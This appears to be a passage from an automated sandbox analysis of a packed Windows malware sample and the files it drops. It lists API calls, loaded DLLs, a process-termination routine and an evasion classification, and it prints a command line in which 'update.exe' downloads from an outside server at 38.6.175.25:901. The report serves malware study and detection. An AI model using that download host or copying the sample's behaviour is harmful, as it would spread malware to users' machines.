Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00421AA0 IsWindowEnabled,TranslateAcceleratorA,IsChild,GetFocus,PostMessageA,PostMessageA,SendMessageA,IsChild,IsWindow,IsWindowVisible,SendMessageA,SendMessageA,SendMessageA,SendMessageA,GetParent,SendMessageA,WinHelpA,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,IsWindow, 3_2_00421AA0
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0043C0C0 GetKeyState,GetKeyState,GetKeyState,GetKeyState, 7_2_0043C0C0
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_004426E0 IsWindowEnabled,TranslateAcceleratorA,IsChild,GetFocus,PostMessageA,PostMessageA,SendMessageA,IsChild,IsWindow,IsWindowVisible,SendMessageA,SendMessageA,SendMessageA,SendMessageA,GetParent,SendMessageA,WinHelpA,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,IsWindow, 7_2_004426E0
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0049706E GetKeyState,GetKeyState,GetKeyState,GetKeyState, 7_2_0049706E
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0049557D GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 7_2_0049557D
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_004516E0 GetKeyState,GetKeyState,GetKeyState,CopyRect, 7_2_004516E0

System Summary

Source: 16.exe.0.dr Static PE information: .vmp0 and .vmp1 section names
Source: update.exe.4.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0048E06C 0_2_0048E06C
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_004400D0 0_2_004400D0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00456256 0_2_00456256
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_004703C0 0_2_004703C0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_004523D0 0_2_004523D0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0047C440 0_2_0047C440
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00448412 0_2_00448412
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00456541 0_2_00456541
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00466520 0_2_00466520
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0045C530 0_2_0045C530
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_004945FF 0_2_004945FF
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_004705F0 0_2_004705F0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00432580 0_2_00432580
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00468670 0_2_00468670
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00462620 0_2_00462620
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_004566F4 0_2_004566F4
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00464830 0_2_00464830
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_004828C0 0_2_004828C0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0045696E 0_2_0045696E
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00448970 0_2_00448970
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00452910 0_2_00452910
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0045C9AE 0_2_0045C9AE
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0044EA00 0_2_0044EA00
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0046CA20 0_2_0046CA20
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00466AA0 0_2_00466AA0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0042CB10 0_2_0042CB10
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0045CBFE 0_2_0045CBFE
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0041CD40 0_2_0041CD40
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0044ED10 0_2_0044ED10
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00456DA0 0_2_00456DA0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0046CE40 0_2_0046CE40
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00455040 0_2_00455040
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_004630C0 0_2_004630C0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0044F140 0_2_0044F140
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00457270 0_2_00457270
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_004533D0 0_2_004533D0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00445450 0_2_00445450
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_004194E0 0_2_004194E0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_004574A0 0_2_004574A0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0045D700 0_2_0045D700
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00445780 0_2_00445780
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0041B850 0_2_0041B850
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0047B870 0_2_0047B870
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00455880 0_2_00455880
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00445910 0_2_00445910
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00447B7B 0_2_00447B7B
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00453BC0 0_2_00453BC0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0045DBA0 0_2_0045DBA0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00425BB0 0_2_00425BB0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00449D80 0_2_00449D80
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_0047BD80 0_2_0047BD80
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00455D99 0_2_00455D99
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00489E16 0_2_00489E16
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00457EE0 0_2_00457EE0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00423E80 0_2_00423E80
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00447EAD 0_2_00447EAD
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00441FD0 0_2_00441FD0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0048E06C 3_2_0048E06C
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_004400D0 3_2_004400D0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00456256 3_2_00456256
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_004703C0 3_2_004703C0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_004523D0 3_2_004523D0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0047C440 3_2_0047C440
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00448412 3_2_00448412
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00456541 3_2_00456541
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00466520 3_2_00466520
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0045C530 3_2_0045C530
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_004945FF 3_2_004945FF
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_004705F0 3_2_004705F0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00432580 3_2_00432580
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00468670 3_2_00468670
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00462620 3_2_00462620
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_004566F4 3_2_004566F4
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00464830 3_2_00464830
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_004828C0 3_2_004828C0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0045696E 3_2_0045696E
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00448970 3_2_00448970
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00452910 3_2_00452910
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0045C9AE 3_2_0045C9AE
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0044EA00 3_2_0044EA00
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0046CA20 3_2_0046CA20
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00466AA0 3_2_00466AA0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0042CB10 3_2_0042CB10
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0045CBFE 3_2_0045CBFE
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0041CD40 3_2_0041CD40
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0044ED10 3_2_0044ED10
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00456DA0 3_2_00456DA0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0046CE40 3_2_0046CE40
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00455040 3_2_00455040
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_004630C0 3_2_004630C0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0044F140 3_2_0044F140
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00457270 3_2_00457270
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_004533D0 3_2_004533D0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00445450 3_2_00445450
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_004194E0 3_2_004194E0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_004574A0 3_2_004574A0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0045D700 3_2_0045D700
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00445780 3_2_00445780
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0041B850 3_2_0041B850
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0047B870 3_2_0047B870
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00455880 3_2_00455880
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00445910 3_2_00445910
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00447B7B 3_2_00447B7B
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00453BC0 3_2_00453BC0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0045DBA0 3_2_0045DBA0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00425BB0 3_2_00425BB0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00449D80 3_2_00449D80
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_0047BD80 3_2_0047BD80
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00455D99 3_2_00455D99
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00489E16 3_2_00489E16
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00457EE0 3_2_00457EE0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00423E80 3_2_00423E80
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00447EAD 3_2_00447EAD
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 3_2_00441FD0 3_2_00441FD0
Source: C:\Users\user\Desktop\update.exe Code function: 7_3_02184710 7_3_02184710
Source: C:\Users\user\Desktop\update.exe Code function: 7_3_02184A00 7_3_02184A00
Source: C:\Users\user\Desktop\update.exe Code function: 7_3_02181260 7_3_02181260
Source: C:\Users\user\Desktop\update.exe Code function: 7_3_02182790 7_3_02182790
Source: C:\Users\user\Desktop\update.exe Code function: 7_3_02186480 7_3_02186480
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_004393C0 7_2_004393C0
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0046A110 7_2_0046A110
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0043E2C0 7_2_0043E2C0
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_004483E0 7_2_004483E0
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0048E4CD 7_2_0048E4CD
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0047A500 7_2_0047A500
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0043C780 7_2_0043C780
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0049481C 7_2_0049481C
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0043A890 7_2_0043A890
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0046ABB0 7_2_0046ABB0
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_00482C90 7_2_00482C90
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0046EEB0 7_2_0046EEB0
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0047AFF0 7_2_0047AFF0
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_004730C0 7_2_004730C0
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0047B130 7_2_0047B130
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_00437210 7_2_00437210
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0047B470 7_2_0047B470
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0047D740 7_2_0047D740
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0047B7B0 7_2_0047B7B0
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0047B990 7_2_0047B990
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_00479AA0 7_2_00479AA0
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_00459B60 7_2_00459B60
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0045BB90 7_2_0045BB90
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_0044DBA0 7_2_0044DBA0
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_00489F46 7_2_00489F46
Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\update.exe E5C30E02DAA7C7178EE58F7F74F27A8CA4134AD736BA15CF34F863D8B70B2516
Source: C:\Users\user\Desktop\update.exe Code function: String function: 004827CF appears 42 times
Source: C:\Users\user\Desktop\update.exe Code function: String function: 004938DC appears 44 times
Source: C:\Users\user\Desktop\update.exe Code function: String function: 00482EB2 appears 34 times
Source: C:\Users\user\Desktop\update.exe Code function: String function: 00483717 appears 32 times
Source: C:\Users\user\Desktop\update.exe Code function: String function: 0042A5E3 appears 31 times
Source: C:\Users\user\Desktop\update.exe Code function: String function: 00484854 appears 88 times
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: String function: 004823FB appears 84 times
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: String function: 0046CA90 appears 46 times
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: String function: 004936BF appears 88 times
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: String function: 00470080 appears 34 times
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: String function: 0044E440 appears 154 times
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: String function: 0044E2E0 appears 50 times
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: String function: 0044E1C0 appears 78 times
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: String function: 00491AE6 appears 52 times
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: String function: 00483FF4 appears 198 times
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: String function: 0044E030 appears 170 times
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: String function: 0049234C appears 44 times
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: String function: 0049B2C5 appears 40 times
Source: #U4fdd#U62a4#U795e1.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal92.evad.winEXE@6/4@0/2
Source: C:\Users\user\Desktop\update.exe Code function: 7_2_00478290 GetLastError,FormatMessageA, 7_2_00478290
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00468C30 FindWindowA,GetWindowThreadProcessId,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,TerminateProcess, 0_2_00468C30
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00468FE0 CoCreateInstance,MultiByteToWideChar, 0_2_00468FE0
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Code function: 0_2_00492E30 __EH_prolog,FindResourceA,LoadResource,LockResource,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow, 0_2_00492E30
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\???[1].txt
Source: C:\Users\user\Desktop\ 16.exe Mutant created: \Sessions\1\BaseNamedObjects\tbdg
Source: #U4fdd#U62a4#U795e1.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: #U4fdd#U62a4#U795e1.exe ReversingLabs: Detection: 47%
Source: unknown Process created: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe "C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe"
Source: unknown Process created: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe "C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe"
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Process created: C:\Users\user\Desktop\ 16.exe C:\Users\user\Desktop\ 16.exe
Source: C:\Users\user\Desktop\ 16.exe Process created: C:\Users\user\Desktop\update.exe update.exe 1.2 16.exe http://38.6.175.25:901/down http://38.6.175.25:901
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Process created: C:\Users\user\Desktop\ 16.exe C:\Users\user\Desktop\ 16.exe
Source: C:\Users\user\Desktop\ 16.exe Process created: C:\Users\user\Desktop\update.exe update.exe 1.2 16.exe http://38.6.175.25:901/down http://38.6.175.25:901
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\#U4fdd#U62a4#U795e1.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\ 16.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\ 16.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\ 16.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\ 16.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\ 16.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\ 16.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\ 16.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\ 16.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\update.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\update.exe Section loaded: acgenral.dll
Source: C:\Users\user\Desktop\update.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\update.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\update.exe Section loaded: samcli.dll
Source: C:\Users\user\Desktop\update.exe Section loaded: msacm32.dll
Source: C:\Users\user\Desktop\update.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\update.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\update.exe Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\update.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\update.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\update.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\update.exe Section loaded: winmmbase.dll
Source: C:\Users\user\Desktop\update.exe Section loaded: winmmbase.dll
Source: C:\Users\user\Desktop\update.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\update.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\update.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\update.exe Section loaded: aclayers.dll
Source: C:\Users\user\Desktop\update.exe Section loaded: sfc.dll
Source: C:\Users\user\Desktop\update.exe Section loaded: sfc_os.dll
Source: C:\Users\user\Desktop\update.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\update.exe Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\update.exe Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\update.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\update.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\update.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\update.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\update.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\update.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\update.exe Section loaded: wintypes.dll
